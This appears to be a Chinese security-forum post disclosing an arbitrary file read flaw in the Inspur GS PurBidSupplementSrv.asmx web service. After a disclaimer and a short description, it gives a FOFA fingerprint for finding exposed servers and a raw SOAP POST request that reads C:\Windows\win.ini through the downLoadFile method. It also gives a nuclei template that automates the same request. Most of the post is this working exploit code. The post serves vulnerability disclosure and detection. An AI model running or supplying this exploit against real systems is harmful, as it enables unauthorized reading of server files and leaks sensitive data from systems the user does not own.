浪潮GS PurBidSupplementSrv.asmx 任意文件读取-网络安全论坛-网络安全-阻击者联盟

浪潮GS PurBidSupplementSrv.asmx 任意文件读取

免责声明

       请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述:

浪潮GS PurBidSupplementSrv.asmx 存在任意文件读取漏洞。攻击者可以利用该漏洞,通过特定的请求,读取服务器上的任意文件。这可能导致敏感信息泄露,进一步威胁系统的安全性

影响版本:

 

浪潮GS

 

FOFA:

"cwbase/web/scripts/aes.js"

POC:

POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: GSPWebLanguageKey=zh-CN
Upgrade-Insecure-Requests: 1

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body xmlns:m="http://tempuri.org/">
<m:downLoadFile>
<m:filePath>C:\\Windows\\win.ini</m:filePath>
<m:offset>0</m:offset>
</m:downLoadFile>
</soap:Body>
</soap:Envelope>

查看返回内容是否是windows的win.ini文件内容

nuclei模板

id: inspur-gs-purbidsupplementsrv-file-read

info:
  name: Inspur GS PurBidSupplementSrv Arbitrary File Read
  author: ProjectDiscoveryAI
  severity: high
  description: |
    This template checks for an arbitrary file read vulnerability in Inspur GS PurBidSupplementSrv.
    It sends a SOAP request to read the 'C:\\Windows\\win.ini' file.
  tags: inspur, file-read, soap, xml

http:
  - raw:
      - |
        POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Cookie: GSPWebLanguageKey=zh-CN
        Upgrade-Insecure-Requests: 1

        <?xml version="1.0"?>
        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body xmlns:m="http://tempuri.org/">
        <m:downLoadFile>
        <m:filePath>C:\\Windows\\win.ini</m:filePath>
        <m:offset>0</m:offset>
        </m:downLoadFile>
        </soap:Body>
        </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "[extensions]"
          - "[mci extensions]"

      - type: word
        part: header
        words:
          - "text/xml"

 

请登录后发表评论

    没有回复内容